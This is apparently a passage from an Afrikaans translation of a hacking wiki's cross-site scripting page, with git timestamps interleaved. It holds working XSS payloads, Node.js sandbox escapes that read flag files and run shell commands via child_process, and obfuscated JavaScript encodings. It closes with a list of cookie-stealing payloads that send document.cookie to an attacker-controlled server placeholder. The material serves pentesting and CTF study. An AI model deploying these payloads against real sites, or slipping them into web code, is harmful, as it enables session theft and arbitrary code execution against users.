Hierdie gedrag is gebruik in [**hierdie skrywe** ](https://github.com/zwade/yaca/tree/master/solution ) om 'n biblioteek te herverdeel na eval om dit te misbruik, dit kan XSS ontketen.
2024-04-06 18:08:38 +00:00
2024-07-19 16:15:11 +00:00
* [**speculationrules** ](https://github.com/WICG/nav-speculation )**:** Hierdie kenmerk is hoofsaaklik om 'n paar probleme wat deur voorvertoning veroorsaak word, op te los. Dit werk soos volg:
2023-01-05 13:05:03 +00:00
```html
< script type = "speculationrules" >
{
2024-02-11 02:07:06 +00:00
"prerender": [
{"source": "list",
"urls": ["/page/2"],
"score": 0.5},
{"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1}
]
2023-01-05 13:05:03 +00:00
}
< / script >
```
2024-08-18 11:01:35 +00:00
### Web Inhoudstipes na XSS
2024-04-06 18:08:38 +00:00
2024-08-18 11:01:35 +00:00
(From [**here** ](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/ )) Die volgende inhoudstipes kan XSS in alle blaaiers uitvoer:
2023-01-05 13:05:03 +00:00
* text/html
* application/xhtml+xml
* application/xml
* text/xml
* image/svg+xml
2024-07-19 16:15:11 +00:00
* text/plain (?? nie in die lys nie, maar ek dink ek het dit in 'n CTF gesien)
2024-02-11 02:07:06 +00:00
* application/rss+xml (af)
* application/atom+xml (af)
2023-01-05 13:05:03 +00:00
2024-07-19 16:15:11 +00:00
In ander blaaiers kan ander ** `Content-Types` ** gebruik word om arbitrêre JS uit te voer, kyk: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md ](https://github.com/BlackFan/content-type-research/blob/master/XSS.md )
2023-01-05 13:05:03 +00:00
2024-08-18 11:01:35 +00:00
### xml Inhoudstype
2023-03-03 17:26:17 +00:00
2024-08-18 11:01:35 +00:00
As die bladsy 'n text/xml inhoudstype teruggee, is dit moontlik om 'n naamruimte aan te dui en arbitrêre JS uit te voer:
2023-03-03 17:26:17 +00:00
```xml
< xml >
< text > hello< img src = "1" onerror = "alert(1)" xmlns = "http://www.w3.org/1999/xhtml" / > < / text >
< / xml >
<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
```
2024-02-11 02:07:06 +00:00
### Spesiale Vervangingspatrone
2023-03-03 17:26:17 +00:00
2024-07-19 16:15:11 +00:00
Wanneer iets soos ** `"some {{template}} data".replace("{{template}}", <user_input>)` ** gebruik word. Die aanvaller kan [**spesiale string vervangings** ](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global\_Objects/String/replace#specifying\_a\_string\_as\_the\_replacement ) gebruik om te probeer om sekere beskermings te omseil: ``"123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))``
2023-01-05 13:05:03 +00:00
2024-07-19 16:15:11 +00:00
Byvoorbeeld in [**hierdie skrywe** ](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA ), is dit gebruik om ** 'n JSON-string** binne 'n skrip te ontsnap en arbitrêre kode uit te voer.
2023-01-05 13:05:03 +00:00
2024-02-11 02:07:06 +00:00
### Chrome Cache na XSS
2023-01-13 17:40:30 +00:00
2023-08-08 08:05:16 +00:00
{% content-ref url="chrome-cache-to-xss.md" %}
[chrome-cache-to-xss.md ](chrome-cache-to-xss.md )
{% endcontent-ref %}
2024-02-11 02:07:06 +00:00
### XS Jails Ontsnapping
2022-07-10 22:26:52 +00:00
2024-09-22 16:51:03 +00:00
As jy slegs 'n beperkte stel karakters het om te gebruik, kyk na hierdie ander geldige oplossings vir XSJail probleme:
2022-07-10 22:26:52 +00:00
```javascript
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))
// use of with
with(console)log(123)
with(/console.log(1)/)with(this)with(constructor)constructor(source)()
2024-02-11 02:07:06 +00:00
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
2022-07-10 22:26:52 +00:00
with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
2024-02-11 02:07:06 +00:00
//Final solution
2022-07-10 22:26:52 +00:00
with(
2024-02-11 02:07:06 +00:00
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
2022-07-10 22:26:52 +00:00
with(this)
2024-02-11 02:07:06 +00:00
with(constructor)
constructor(source)()
2022-07-10 22:26:52 +00:00
// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```
2024-07-19 16:15:11 +00:00
As **alles is onbepaald** voordat onbetroubare kode uitgevoer word (soos in [**hierdie skrywe** ](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves )) is dit moontlik om nuttige voorwerpe "uit niks" te genereer om die uitvoering van arbitrêre onbetroubare kode te misbruik:
2022-07-10 22:26:52 +00:00
2024-07-19 16:15:11 +00:00
* Deur import() te gebruik
2023-08-08 08:05:16 +00:00
```javascript
// although import "fs" doesn’ t work, import('fs') does.
import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))
```
2024-07-19 16:15:11 +00:00
* Toegang tot `require` indirek
2023-08-08 08:05:16 +00:00
2024-07-19 16:15:11 +00:00
[Volgens hierdie ](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050 ) word modules deur Node.js binne 'n funksie toegedraai, soos volg:
2023-08-08 08:05:16 +00:00
```javascript
(function (exports, require, module, __filename, __dirname) {
2024-02-11 02:07:06 +00:00
// our actual module code
2023-08-08 08:05:16 +00:00
});
```
2024-09-19 16:41:42 +00:00
Daarom, as ons van daardie module ** 'n ander funksie kan aanroep**, is dit moontlik om `arguments.callee.caller.arguments[1]` van daardie funksie te gebruik om ** `require` ** te bekom:
2023-08-08 08:05:16 +00:00
{% code overflow="wrap" %}
```javascript
(function(){return arguments.callee.caller.arguments[1]("fs").readFileSync("/flag.txt", "utf8")})()
```
{% endcode %}
2024-09-22 16:51:03 +00:00
Op 'n soortgelyke manier as die vorige voorbeeld, is dit moontlik om **fouthanterings** te gebruik om toegang te verkry tot die **wrapper** van die module en die ** `require` ** funksie te kry:
2023-08-08 08:05:16 +00:00
```javascript
try {
2024-02-11 02:07:06 +00:00
null.f()
2023-08-08 08:05:16 +00:00
} catch (e) {
2024-02-11 02:07:06 +00:00
TypeError = e.constructor
2023-08-08 08:05:16 +00:00
}
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
2024-02-11 02:07:06 +00:00
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
2023-08-08 08:05:16 +00:00
}
function trigger() {
2024-02-11 02:07:06 +00:00
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log('='.repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req('child_process').execSync('id').toString())
}
}
2023-08-08 08:05:16 +00:00
}
trigger()
```
2024-09-19 16:41:42 +00:00
### Obfuscation & Advanced Bypass
2024-04-06 18:08:38 +00:00
2024-09-19 16:41:42 +00:00
* **Verskillende obfuscasies op een bladsy:** [**https://aem1k.com/aurebesh.js/** ](https://aem1k.com/aurebesh.js/ )
2020-07-15 15:43:14 +00:00
* [https://github.com/aemkei/katakana.js ](https://github.com/aemkei/katakana.js )
2022-02-02 15:35:20 +00:00
* [https://ooze.ninja/javascript/poisonjs ](https://ooze.ninja/javascript/poisonjs )
* [https://javascriptobfuscator.herokuapp.com/ ](https://javascriptobfuscator.herokuapp.com )
* [https://skalman.github.io/UglifyJS-online/ ](https://skalman.github.io/UglifyJS-online/ )
2021-10-18 11:21:18 +00:00
* [http://www.jsfuck.com/ ](http://www.jsfuck.com )
2024-02-11 02:07:06 +00:00
* Meer gesofistikeerde JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce ](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce )
2020-07-15 15:43:14 +00:00
* [http://utf-8.jp/public/jjencode.html ](http://utf-8.jp/public/jjencode.html )
2021-05-27 11:24:11 +00:00
* [https://utf-8.jp/public/aaencode.html ](https://utf-8.jp/public/aaencode.html )
2022-09-23 09:06:24 +00:00
* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses ](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses )
2020-07-15 15:43:14 +00:00
```javascript
2021-05-27 11:24:11 +00:00
//Katana
2020-07-15 15:43:14 +00:00
< script > ( [ , ウ , , , , ア ] = [ ] + { } , [ ネ , ホ , ヌ , セ , , ミ , ハ , ヘ , , , ナ ] = [ ! ! ウ ] + ! ウ + ウ . ウ ) [ ツ = ア + ウ + ナ + ヘ + ネ + ホ + ヌ + ア + ネ + ウ + ホ ] [ ツ ] ( ミ + ハ + セ + ホ + ネ + '(-~ウ)' ) ( ) < / script >
```
```javascript
2024-02-11 02:07:06 +00:00
//JJencode
2020-07-15 15:43:14 +00:00
< script > $ =~ []; $ = { ___ :++ $ , $ : ( ! [] + "" )[ $ ], __$ :++ $ , $_$_ : ( ! [] + "" )[ $ ], _$_ :++ $ , $_$ : ({} + "" )[ $ ], $_$ : ( $ [ $ ] + "" )[ $ ], _$ :++ $ , $_ : ( ! "" + "" )[ $ ], $__ :++ $ , $_$ :++ $ , $__ : ({} + "" )[ $ ], $_ :++ $ , $ :++ $ , $___ :++ $ , $__$ :++ $ }; $ . $_ = ( $ . $_ = $ + "" )[ $ . $_$ ] + ( $ . _$ = $ . $_ [ $ . __$ ]) + ( $ . $ = ( $ . $ + "" )[ $ . __$ ]) + (( ! $ ) + "" )[ $ . _$ ] + ( $ . __ = $ . $_ [ $ . $_ ]) + ( $ . $ = ( ! "" + "" )[ $ . __$ ]) + ( $ . _ = ( ! "" + "" )[ $ . _$_ ]) + $ . $_ [ $ . $_$ ] + $ . __ + $ . _$ + $ . $ ; $ . $ = $ . $ + ( ! "" + "" )[ $ . _$ ] + $ . __ + $ . _ + $ . $ + $ . $ ; $ . $ = ( $ . ___ )[ $ . $_ ][ $ . $_ ]; $ . $ ( $ . $ ( $ . $ + " \"" + $ . $_$_ + ( ! [] + "" )[ $ . _$_ ] + $ . $_ + " \\" + $ . __$ + $ . $_ + $ . _$_ + $ . __ + "(" + $ . ___ + ")" + " \"" )())();</ script >
```
```javascript
//JSFuck
< script > ( + [ ] ) [ ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( [ ] [ [ ] ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( [ ] [ [ ] ] + [ ] ) [ + [ ] ] + ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] ] [ ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( [ ] [ [ ] ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( [ ] [ [ ] ] + [ ] ) [ + [ ] ] + ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] ] ( ( ! [ ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( [ ] [ ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( [ ] [ [ ] ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( [ ] [ [ ] ] + [ ] ) [ + [ ] ] + ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ [ + ! + [ ] ] + [ ! + [ ] + ! + [ ] + ! + [ ] + ! + [ ] ] ] + [ + [ ] ] + ( [ ] [ ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( [ ] [ [ ] ] + [ ] ) [ + ! + [ ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] + ( [ ] [ [ ] ] + [ ] ) [ + [ ] ] + ( [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! ! [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] [ ( ! [ ] + [ ] ) [ + [ ] ] + ( [ ! [ ] ] + [ ] [ [ ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! [ ] + [ ] ) [ ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + [ ] ] + ( ! + [ ] + [ ] ) [ ! + [ ] + ! + [ ] + ! + [ ] ] + ( ! + [ ] + [ ] ) [ + ! + [ ] ] ] ) [ + ! + [ ] + [ + [ ] ] ] + ( ! ! [ ] + [ ] ) [ + ! + [ ] ] ] + [ ] ) [ [ + ! + [ ] ] + [ ! + [ ] + ! + [ ] + ! + [ ] + ! + [ ] + ! + [ ] ] ] ) ( ) < / script >
```
2021-05-27 11:24:11 +00:00
```javascript
//aaencode
゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');
```
2023-03-03 16:32:17 +00:00
```javascript
// It's also possible to execute JS code only with the chars: []`+!${}
```
2024-07-19 16:15:11 +00:00
## XSS algemene payloads
2024-04-06 18:08:38 +00:00
2024-07-19 16:15:11 +00:00
### Verskeie payloads in 1
2022-03-14 23:00:10 +00:00
{% content-ref url="steal-info-js.md" %}
[steal-info-js.md ](steal-info-js.md )
{% endcontent-ref %}
2024-09-19 16:41:42 +00:00
### Iframe Lokval
2024-06-14 10:18:18 +00:00
2024-09-22 16:51:03 +00:00
Laat die gebruiker in die bladsy navigeer sonder om 'n iframe te verlaat en steel sy aksies (insluitend inligting wat in vorms gestuur word):
2024-06-14 10:18:18 +00:00
{% content-ref url="../iframe-traps.md" %}
[iframe-traps.md ](../iframe-traps.md )
{% endcontent-ref %}
2024-07-19 16:15:11 +00:00
### Herwin Koekies
2020-07-15 15:43:14 +00:00
```javascript
< img src = x onerror = this.src="http://<YOUR_SERVER_IP > /?c="+document.cookie>
< img src = x onerror = "location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie" >
< script > new Image ( ) . src = "http://<IP>/?c=" + encodeURI ( document . cookie ) ; < / script >
2021-05-27 11:59:23 +00:00
< script > new Audio ( ) . src = "http://<IP>/?c=" + escape ( document . cookie ) ; < / script >
2020-07-15 15:43:14 +00:00
< script > location . href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie < / script >
< script > location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie < / script >
< script > document . location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie < / script >
< script > document . location . href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie < / script >
< script > document . write ( '<img src="http://<YOUR_SERVER_IP>?c=' + document . cookie + '" />' ) < / script >
< script > window . location . assign ( 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie ) < / script >
< script > window [ 'location' ] [ 'assign' ] ( 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie ) < / script >
< script > window [ 'location' ] [ 'href' ] ( 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie ) < / script >
< script > document . location = [ "http://<YOUR_SERVER_IP>?c" , document . cookie ] . join ( ) < / script >
< script > var i = new Image ( ) ; i . src = "http://<YOUR_SERVER_IP>/?c=" + document . cookie < / script >
< script > window . location = "https://<SERVER_IP>/?c=" . concat ( document . cookie ) < / script >
< script > var xhttp = new XMLHttpRequest ( ) ; xhttp . open ( "GET" , "http://<SERVER_IP>/?c=" % 2 Bdocument . cookie , true ) ; xhttp . send ( ) ; < / script >
